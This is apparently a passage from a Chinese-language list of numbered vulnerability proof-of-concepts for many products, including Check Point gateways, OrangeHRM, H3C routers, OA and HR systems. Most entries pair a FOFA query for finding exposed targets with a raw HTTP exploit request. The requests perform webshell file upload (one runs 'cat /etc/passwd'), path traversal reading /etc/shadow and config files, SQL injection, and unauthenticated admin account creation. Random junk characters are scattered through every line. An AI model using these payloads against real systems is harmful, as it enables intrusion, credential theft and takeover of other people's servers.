+ T ?% d3 }# \ F5 u" dxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
: p, `$ W$ D, e0 \3 y* g<soap:Body>0 x: k1 a. L4 m! X8 p
<UploadResume xmlns="http://tempuri.org/">, Z d7 `# Y0 X; a% K- A# y& K) f
<ip>1</ip>
5 b( Y+ q) R- a% b4 g7 H2 ?6 V<fileName>../../../../dizxdell.aspx</fileName>- b, X# o, A7 k8 a. S2 A& }
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
. y+ Z; d Q, D8 Z: O<tag>3</tag>
! s. v5 | \: ?# U" Y</UploadResume>
9 l! }! Q5 b9 V l: L! [+ w</soap:Body>" u/ {- R! t$ ?3 E$ K/ Z+ ^
</soap:Envelope>
% U; v @0 v4 j+ k0 S; M3 E8 D% U+ h& _) @8 w1 r$ _3 x- Q
$ J. h5 W0 g% s" r9 r5 b* U3 @$ fhttp://x.x.x.x/dizxdell.aspx5 b0 j. M8 [4 Z- X: l! d7 L
# Z4 k5 E$ X3 Y, R5 u# ~/ A4 M
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
/ z- [& I d! R* }5 }FOFA: app="和丰山海-数字标牌"
. G0 C9 G7 Y; w% sPOST /QH.aspx HTTP/1.1# \2 k9 A9 c. D: e
Host: x.x.x.x7 c6 S! w* L- b) k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
5 m: D5 P/ }$ `) W; n1 Y+ p# eConnection: close
" Y6 C7 j* t) T, K9 V; `2 H& jContent-Length: 583
! s N" h7 ?) ?9 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
- `) G6 D4 b/ L1 }6 RAccept-Encoding: gzip
! P' u% c8 y1 c% i/ f. W# D
1 F. {6 z) e' K/ `. D* i2 Z/ d------WebKitFormBoundaryeegvclmyurlotuey+ x# k* d7 w- W" r2 e: c
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
9 l$ K2 X, H: @8 tContent-Type: application/octet-stream
' E) {% e, P1 S5 `
i3 L) s7 @* U+ i# Y' R( [ Y<% response.write("ujidwqfuuqjalgkvrpqy") %>" n% J; Z/ [! U# [7 x5 r6 z" W- I+ i
------WebKitFormBoundaryeegvclmyurlotuey' y8 S& W O7 U+ H, Y" @9 d! I
Content-Disposition: form-data; name="action"- _& |6 u% b7 ~6 k' [4 n: {
0 r8 S y: P! G' Aupload4 d# L% a* N! \* x
------WebKitFormBoundaryeegvclmyurlotuey2 }- W; B2 E; p( G
Content-Disposition: form-data; name="responderId"8 I* p8 X6 @1 G: `2 v7 b! A/ v6 _1 m
' C- B1 ?& X6 eResourceNewResponder
. C% a! G8 l1 _' q$ X% j/ a------WebKitFormBoundaryeegvclmyurlotuey" @* ]2 B) M6 `5 Z, m
Content-Disposition: form-data; name="remotePath"
) d" V+ l& w; l D# h) b0 }1 x9 ^' e; t$ A/ {# ^$ f
/opt/resources
4 B* O* l! Y' @8 W, i------WebKitFormBoundaryeegvclmyurlotuey--
/ s1 ^ ]/ M% C; _/ a" d2 v" A0 S% l: v0 }$ D! t: B% f
! K$ ~3 o; f+ y2 m. Shttp://x.x.x.x/opt/resources/kjuhitjgk.aspx' G1 M7 C7 X+ ?& l+ ^; X
8 u6 _8 d- r5 b163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) G1 m6 t, J4 |8 j, n3 n
FOFA: icon_hash="-795291075"
) J; R+ I M! O' e3 |8 {' NPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
/ [, r4 [, u( B. I1 b+ u. F tHost: x.x.x.x
2 R6 n/ r/ j' s+ \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36; u q7 \" s# [; B: w% I4 U
Connection: close
' F* I* B M! b3 p4 S' VContent-Length: 293
0 W6 z/ s2 l5 T3 J/ q! A$ a+ uAccept: */*& L: t+ {% E8 T3 f
Accept-Encoding: gzip, deflate
6 I' L6 F5 S! ]! {% n! ]7 TAccept-Language: zh-CN,zh;q=0.9$ _" M! N4 D8 |/ X. m0 V. P* L
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod+ s' j2 L: M2 K5 I, u) s
: ^- q" G# v+ k( P4 h------iiqvnofupvhdyrcoqyuujyetjvqgocod
|/ v8 |9 K. w; N Z. ^5 m$ pContent-Disposition: form-data; name="name"
$ C- a+ w# \$ o8 K9 x4 x- [8 y8 s: d5 G6 A
1.php
6 [' |4 C8 b# ]9 |% m------iiqvnofupvhdyrcoqyuujyetjvqgocod
+ v/ E$ P: Q, W8 M/ TContent-Disposition: form-data; name="upfile"; filename="1.php"1 p7 I! U. O& S: G) U. [
Content-Type: image/jpeg; {& B2 D$ B8 o4 j" \
! `1 S0 ^3 o" @) i! j) X% o
rvjhvbhwwuooyiioxega
/ I# D- n# \3 t9 u7 i------iiqvnofupvhdyrcoqyuujyetjvqgocod--
. e2 [$ f% v2 N# r% }. Y
( K3 u. K T K, k) R& A5 i* i, b/ j. r7 Z5 h7 h
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传8 Q3 _( ?$ l/ W+ {4 q
FOFA: title="智慧综合管理平台登入"
0 o0 l$ f; h. Q4 H6 A! E. G _+ J! GPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
8 Y/ O1 u3 L0 w' n* y& Q vHost: x.x.x.x
7 C6 [3 u: g- CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.05 |& n( n2 a3 ?* Z9 s
Content-Length: 2882 p$ Y% V& z1 w+ S, [+ e
Accept: application/json, text/javascript, */*; q=0.01
$ v( U8 J6 E L5 u% GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,5 `9 |% i9 f. ?& v* L" ?6 h
Connection: close3 K& \" O. w+ @8 K6 N; \
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl2 Z' E3 x% W5 K2 i; ~0 D2 T
X-Requested-With: XMLHttpRequest, m% ^+ r. k6 k3 _: a
Accept-Encoding: gzip5 c( N( P+ m! R) |0 W, ?, z
; r$ q1 d2 h5 X1 p% q------dqdaieopnozbkapjacdbdthlvtlyl7 N1 c$ N) r" b7 S
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
% E6 @) g$ x2 h! Y8 h$ gContent-Type: image/jpeg
' k- o! }- r. s) V/ H4 r8 l4 Z( t
" B6 `7 s3 l; [<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
) B) g( }5 l& b2 `------dqdaieopnozbkapjacdbdthlvtlyl--+ G0 G5 ?: s4 O4 E/ z
% P1 L$ E: L( A6 K/ P2 `
$ d P6 o$ E1 ~: ]* B( }' U4 Y, J4 ghttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
# v7 W* f9 I% Z" t0 v+ y4 F9 f w o) T4 J
165. OrangeHRM 3.3.3 SQL 注入5 ?+ A0 s0 D, z9 B7 B+ U
CVE-2024-36428
3 W: j d3 P3 W8 F. r9 xFOFA: app="OrangeHRM-产品"
4 y( I5 a8 }8 s! l2 Y3 pURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))$ q, Z% |' A k' M! V
, |3 J6 a$ N9 p) b
/ p" w. B+ S4 ~/ g
166. 中成科信票务管理平台SeatMapHandler SQL注入
7 g5 @% \# y7 T# i, \1 l" P aFOFA:body="技术支持:北京中成科信科技发展有限公司"' i# U+ E |0 `. S/ _. `
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
0 j* ~1 h a+ f0 THost:
# |) E# j4 Z8 v3 ~+ |Pragma: no-cache
0 I1 S/ u/ l" LCache-Control: no-cache) Q: x, T- X6 v
Upgrade-Insecure-Requests: 1/ F9 v' F. }. o; ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
( M2 D6 K& n" F1 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 t' v5 ]5 ^# t* N9 {# D; OAccept-Encoding: gzip, deflate2 p! n/ l* g% T2 @- C0 M u
Accept-Language: zh-CN,zh;q=0.9,en;q=0.83 a3 J+ m. Z0 O3 g9 P B; n
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE: M" ]9 [) n$ d- P
Connection: close
! V; [- w6 }' q3 T! P+ V- nContent-Type: application/x-www-form-urlencoded
4 S2 s- a6 U" ]& e; i' EContent-Length: 89
- k" Q; z; Q/ ]3 i5 J) G
6 j% X/ L& l- d/ @- B `Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE0 n3 Z3 [( S% o% K' S. Q
9 k) E3 U1 ~0 O4 y0 u' `
: s8 u' k7 O4 |! E
167. 精益价值管理系统 DownLoad.aspx任意文件读取
' u7 K* T' h* `7 g2 L6 U% e2 ~FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
. D2 [& M$ s; ?8 YGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.10 W6 W( y% [+ l% D& {6 G, w
Host:. |$ v3 G0 t* [7 Z. [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# C- p" W) f6 o. |& A3 D: D, _Content-Type: application/x-www-form-urlencoded
0 J1 i4 C: H$ {4 p. JAccept-Encoding: gzip, deflate; Y, z/ n1 @, w7 i8 C6 p, v
Accept: */*
j7 p& M' H( ?4 A5 D0 yConnection: keep-alive6 }" {& i( J% r9 U
5 @8 y" ]+ V% K' A* q+ m0 @
3 T1 \" [$ @! T4 n168. 宏景EHR OutputCode 任意文件读取/ C- C M) ^/ K
FOFA:app="HJSOFT-HCM"
* o1 F+ w* |; c5 K ZGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
9 D- r' u3 W0 p1 L' wHost: your-ip4 f. s6 \4 l) B# @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 y# `8 m* C! k6 d; t$ {9 c0 u- H
Content-Type: application/x-www-form-urlencoded
" C$ q C; u( h5 {, GConnection: close
* {, Y# _% u& X/ @5 M1 i2 y
! e/ i" y0 W8 l- h% z. F8 \( f1 l5 k: [& d) B9 f2 t: z
/ H. x8 G- j! Z) Z& v( ]. t9 z169. 宏景EHR downlawbase SQL注入# F3 ~ P8 m0 e. C" {5 n! A- h
FOFA:app="HJSOFT-HCM"$ ]- ^3 R' J- a- X/ U5 i# |
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1% ]2 |# j$ E9 ~ Q
Host: your-ip
( x- N1 t. E% cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 x! v: H( }5 R! m- M M" B! B5 V
Accept: */*( [2 s. q. D4 [3 r5 N5 e- y
Accept-Encoding: gzip, deflate: X- h) {8 _ O" a' T: z
Connection: close
$ O/ p- i: @- m5 g' R4 H
0 O+ k% ~! ^7 ~0 ~, h) _8 B2 L# ~+ W M! l4 p9 g+ G# Y
: n; s, O: u8 g5 _; u. `. I0 m170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 V' d( z- n: r8 O& ^! j
FOFA:body="/general/sys/hjaxmanage.js"
' g2 u% @9 Q5 S* [0 r, cPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1! q3 d9 V3 Y2 H! m
Host: balalanengliang
' Y+ j* ] g( s JUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 [- U2 v& i* b% YContent-Type: application/x-www-form-urlencoded0 G2 v/ E- S( ~6 u
7 z8 K. o( v/ @' k
filename=../webapps/ROOT/WEB-INF/web.xml, m1 ]5 ^3 z! V0 |1 T( r8 D; }! J
7 \: j# s3 V8 _% C
7 ~+ q. ^. n* R3 @% d! _- z
171. 通天星CMSV6车载定位监控平台 SQL注入5 V! e% r& B# k5 L* U
FOFA:body="/808gps/", f5 Y* b1 t6 T& }5 L* [8 t2 E& D
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1' }7 l5 r7 L" x6 ~6 j
Host: your-ip2 @; U8 C+ Q9 a6 p+ j3 I! c! m: L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
$ @: q1 C/ a' uAccept: */*
6 J, g4 q' p* l S' IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# @6 w4 R0 O7 c* y+ q4 L# T! L6 GAccept-Encoding: gzip, deflate
' j Y, |6 N& iConnection: close
* e4 a: j. j% e, |% \
! \; {% N) W( I& l. X, P. E& o0 d; F) {
( i6 a' [3 X6 M' \: \2 ~) h
* d/ g1 s1 r0 @# [9 U% T! o172. DT-高清车牌识别摄像机任意文件读取* x$ d3 D( b& {( E* `5 T
FOFA:app="DT-高清车牌识别摄像机"
+ u+ w" ^$ J4 Q- E& l+ Q5 O6 IGET /../../../../etc/passwd HTTP/1.1
! q- M' z `9 W+ ?/ U' UHost: your-ip; D6 v& S( r7 A s7 K8 ?. j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; F; d: S9 M: hAccept-Encoding: gzip, deflate& R- [" Y$ C6 A
Accept: */*
$ }9 N# Z* v" y. o$ _: q4 A& wConnection: keep-alive
) [+ c# a% n+ K5 Q
* T+ M$ L0 r. b% X% R( [" o/ B1 A. O- H
: A( j% t" D6 z3 j) o' K8 D* F
173. Check Point 安全网关任意文件读取1 T* ?( D9 e8 N2 C
CVE-2024-24919
& l1 v; _) f8 N$ p0 AFOFA:app="Check_Point-SSL-Network-Extender"5 v% c: a/ o$ F3 n
POST /clients/MyCRL HTTP/1.1) e' U, U6 P4 i+ B
Host: your-ip3 S! o; [4 U- Y# q- B
Content-Type: application/x-www-form-urlencoded; d6 k& _, b" U' [1 e
+ E# A! G8 o+ k4 ^( b
aCSHELL/../../../../../../../etc/shadow3 X2 q4 h( p2 s/ H7 @
9 W. O9 z* F0 o/ U1 m8 m/ |; ~* P4 c' [5 U% Z l* S8 y5 m3 `
+ @ T' R& n/ S2 n
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 |6 O* t$ ~& M1 D. u; DFOFA:app="金和网络-金和OA"% |4 |- [( d7 D0 c( ~2 v' Z
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
. h; W7 q) @/ p7 k6 qHost: your-ip3 R4 ]/ ^" H2 D5 m B3 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
s4 ?5 g4 T2 _' h7 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, {* h7 S5 [; a; Z8 dAccept-Encoding: gzip, deflate, br
9 ?/ Z' ]. v/ e. A" k( ^Accept-Language: zh-CN,zh;q=0.9
8 Z$ A. [1 C* G7 t: CConnection: close
* s1 w+ e- N; ?( L4 L6 G4 ~6 y' ~6 D7 d
! U' H5 v% H s9 X' C& R$ u- L) @5 v6 t; y7 i
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
- Q2 n8 @$ f2 Z0 f/ [, y& @FOFA:app="金和网络-金和OA"* o* l& D( n! h* G$ {, }
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1" ~; O6 j: U5 t# O
Host:
# D, Q, E9 q0 ]/ D/ q: @3 [: {) vUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 h5 J8 }" |# lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" P1 h! t3 E1 G, A3 |' RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& N% D: M+ m+ _, Q0 k# p aAccept-Encoding: gzip, deflate* U$ Q9 a+ Z1 E+ z+ ]
Connection: close
- v" x8 v. x. A$ n" [& TUpgrade-Insecure-Requests: 1, A( C I! ]: i1 @& w/ F7 P4 }9 ]
% y( T# D* z7 P% q& n$ g- d
. X) _8 P C& d; l. Q% r: P2 u- Q; K! @
176. 电信网关配置管理系统 rewrite.php 文件上传+ [* F# ^, g! F% \) I
FOFA:body="img/login_bg3.png" && body="系统登录"
3 N/ W% [6 U# u, q" i4 a! U9 vPOST /manager/teletext/material/rewrite.php HTTP/1.1
) x) M& z( `! h$ u \4 OHost: your-ip
8 `: _' u& K' B, R1 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) w E. a$ n, N( t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
( ~ }% _& w5 j" PConnection: close
; m, }1 z s: T L0 k7 b: _
+ X6 C& O, s' r1 ?------WebKitFormBoundaryOKldnDPT, L% i0 F- B7 G$ o' l
Content-Disposition: form-data; name="tmp_name"; filename="test.php"; ^- p$ z4 D+ @5 X
Content-Type: image/png1 D1 e3 y N! Y: C( G
1 f* I" y8 n7 K1 f( w/ {* K- [
<?php system("cat /etc/passwd");unlink(__FILE__);?>/ z- K$ R/ D8 C Y* d `
------WebKitFormBoundaryOKldnDPT
1 U& }1 Q6 a& K( \6 _( SContent-Disposition: form-data; name="uploadtime"* w. x' |) C* q5 C/ a
3 D; D# G4 C) @+ M0 h- p h& k: m: O4 D1 S3 K3 U1 u$ o
------WebKitFormBoundaryOKldnDPT--. Q+ L+ b) ?# v8 J0 }& a+ T
- K7 h: X6 b$ q0 C8 I
\9 f4 q( g/ L- L$ k7 l
, F% J; C; _8 b
177. H3C路由器敏感信息泄露
5 c& m: C5 l9 I$ q, f/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
$ P# y: `. x6 C' { j/userLogin.asp/../actionpolicy_status/../M60.cfg
+ _8 Y( w8 D6 W/userLogin.asp/../actionpolicy_status/../GR8300.cfg
1 f7 {; O, T+ A/userLogin.asp/../actionpolicy_status/../GR5200.cfg
( l- ? j2 k# P) b/ z/ p) A- S/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/ m j3 \" |* Q: L1 k0 u/userLogin.asp/../actionpolicy_status/../GR2200.cfg
% Y( z; f% z' j! s8 P/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* Q3 Y# Z7 {9 p' C
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
* [% e: X( h9 P( t- S/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
: b- ]) c+ n3 Y7 P+ G5 P5 n/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg! l& ~7 y; r B' J
/userLogin.asp/../actionpolicy_status/../ER5200.cfg4 ?0 B0 t% j6 S' s# X
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
$ B) O+ |: n# J8 i" N# Z* b) x/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg8 m/ g7 F! Y6 P, ~: Y3 ?0 I
/userLogin.asp/../actionpolicy_status/../ER3260.cfg/ S6 F# @3 ?0 X
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg! `9 `6 ?: V) D# ^
/userLogin.asp/../actionpolicy_status/../ER3200.cfg3 y5 {: A9 O) F
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
- m* U9 v R t. F3 t8 _1 U/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
) j5 f* R2 w7 h; h* g/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( m5 b6 _2 z' P% R/userLogin.asp/../actionpolicy_status/../ER3100.cfg
# `5 E u/ s: i$ J' A! O' x/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg# x2 v8 w- f. Y1 ]. Y$ m% L" j0 o
/ S) E e- V+ s o0 [, p- y' B9 m3 a, m o. O
178. H3C校园网自助服务系统-flexfileupload-任意文件上传0 P h4 p- W2 i: T: y. l& N
FOFA:header="/selfservice"9 `+ L8 n2 |, [* l' O9 L
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1& c: u' {: k9 x; N4 J5 l# J
Host:; y7 a2 m& Z: m5 d: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ {+ [: h* S/ {8 D7 L9 s
Content-Length: 252' s% G+ _6 d3 B' w+ a2 Z
Accept-Encoding: gzip, deflate" W+ p( ^/ ^% |" O, Y* C J1 \
Connection: close
4 t) ^; v' C3 N. |) oContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l, |' e4 Z% U+ T6 }
-----------------aqutkea7vvanpqy3rh2l
' J2 [8 j$ |1 pContent-Disposition: form-data; name="12234.txt"; filename="12234"' I8 R6 y/ G' n# @/ W e [
Content-Type: application/octet-stream4 |. o* y/ M# r7 d
Content-Length: 255
+ {4 X9 C6 Y; L# u+ y" }
8 y5 z4 d. ?" e9 g q12234
$ O V' J7 b C-----------------aqutkea7vvanpqy3rh2l--
% P7 a- h1 T* b+ y( |: b2 ~7 _# H& K5 Q. o- \; n: W3 ^
3 j; ?; e: X. i5 |7 _' SGET /imc/primepush/%2e%2e/flex/12234.txt9 Q1 r9 i; q7 r$ H& j3 a
G* O, `4 t( j7 t1 E/ \
/ i# ^! O4 L/ c( o/ F% H
179. 建文工程管理系统存在任意文件读取
8 v$ A, S; {- p8 }POST /Common/DownLoad2.aspx HTTP/1.1& S# W! \# u9 L$ k n
Host: {{Hostname}}& B1 s2 ^3 z( ]2 q' h. e7 Y
Content-Type: application/x-www-form-urlencoded5 B7 q/ P+ j4 e# T) v
User-Agent: Mozilla/5.0+ A: H9 k* @# Q+ n2 N' |( Z
/ B* x9 \( Z! Z+ G" J, P: \path=../log4net.config&Name=. F2 c+ [* @5 a0 u3 N' C
; \: w% W- L0 k: x% j5 S
( W: g, G8 ~$ B4 _' P: a$ J2 a: j
180. 帮管客 CRM jiliyu SQL注入
, g0 X2 Q4 B& J- U0 m* P$ oFOFA:app="帮管客-CRM"
& c! Y0 z( E. @6 d* }6 H: Z+ fGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
0 B, |/ `0 d7 m$ |1 I/ K) l+ A6 ZHost: your-ip
9 L7 g7 I4 _8 G$ W( e+ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 C( {! F8 h8 {: ]9 g2 s$ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: j. q) F1 ]! z
Accept-Encoding: gzip, deflate# e$ I( n) D, p1 W0 _
Accept-Language: zh-CN,zh;q=0.9, n; B' o4 E3 w: Y0 F' h
Connection: close
# @" w& G% W. L, j1 |9 \; l; }) T* s. a" q z! M
# R/ B4 `4 w, V181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入: l0 d# W* G) E6 u _
FOFA:"PDCA/js/_publicCom.js"
; o7 X$ P! ?7 _5 r3 F+ B, fPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1 @3 M; w) _' ?/ H! Y
Host: your-ip Z9 |0 L7 K+ P# }' q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36/ W5 @' l5 b6 W) @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% {+ L) s) [ b# b. n# a- D% m
Accept-Encoding: gzip, deflate, br: y6 j0 n* f! B- @3 I
Accept-Language: zh-CN,zh;q=0.91 q; U D' [$ ], U
Connection: close* a: ?9 o" L+ C, V% g8 N) j% ~
Content-Type: application/x-www-form-urlencoded* a/ |3 c* t- H3 }
% Q: C2 V( L1 T% L a5 n8 V$ m) h! c' a0 r8 L
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20$ h# K, l$ N6 ^! P3 w1 G
}+ p. D5 u- d$ N: l9 a8 ` Z+ j: T! d6 y
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" s1 `7 T B) T8 Q2 t& K) I# _
FOFA:"PDCA/js/_publicCom.js"# j9 J$ U$ q, Q0 p6 o* K
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1' i- s& n5 J4 u6 b3 q' y
Host: your-ip
: ^4 ?" @4 a0 U2 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 ]" f5 q8 H5 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: Z; O; u: |" K/ ]& _" h
Accept-Encoding: gzip, deflate, br
( w1 \2 R5 S+ T9 PAccept-Language: zh-CN,zh;q=0.9 _, k' L w2 o1 x8 P3 V, f2 y/ y/ {
Connection: close6 b6 A; b- ~5 ?
Content-Type: application/x-www-form-urlencoded
! \ ^+ T# X! _4 r4 M1 X" o( @& s# U: L2 @
# h7 d% x: O' z3 ?5 E' ]
username=test1234&pwd=test1234&savedays=19 S" Q7 o" |6 j P+ ?! z
0 ^6 G/ f! g! C6 v8 d* @
4 U6 z- L* N& U/ C5 d5 P5 k$ X+ ?183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
/ L _! r5 i: J- S- xFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"3 n5 O7 A! V7 {. d& d
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1. L0 m6 e: b7 n4 o! U
Host: your-ip
( a" n9 A( z( @4 yUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' ~3 p- S0 ?2 B& u2 PAccept-Charset: utf-88 A' f% F# b5 ?6 |1 a
Accept-Encoding: gzip, deflate
6 x# X( L" T( [/ j& AConnection: close
3 D& ]3 H% J& x n3 ~/ [8 z, F% ~' w
& W6 ?- H$ ?# L9 ?* m
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
7 R. [0 _3 D, M" }& U/ V4 eFOFA:server="SunFull-Webs"- x, d# _) @# N6 i! Y
POST /soap/AddUser HTTP/1.1# g7 i; V: T# r# l) O* b
Host: your-ip* p0 X" a4 U* N/ |) b
Accept-Encoding: gzip, deflate% R: Q# b5 e; y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+ F/ K6 r- _4 e \! HAccept: application/xml, text/xml, */*; q=0.018 ?. S; z- ] C6 O; `" f6 s
Content-Type: text/xml; charset=utf-8
' M; j! H! z) H, \. |% r _' ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( Y$ Q# E) Z) y* l0 lX-Requested-With: XMLHttpRequest
# u& b: |5 t* N8 A( z* V6 U( ^" {' w9 m1 u1 s6 o" h
5 p/ Q+ A% O; S: @5 I2 kinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
, p' F+ o4 C4 G5 g! ~7 B. t3 J% F5 a }+ @
3 G' d: f. K* K9 G [0 a, C9 h185. 瑞友天翼应用虚拟化系统SQL注入- z5 {) @$ O/ [* m: B; X
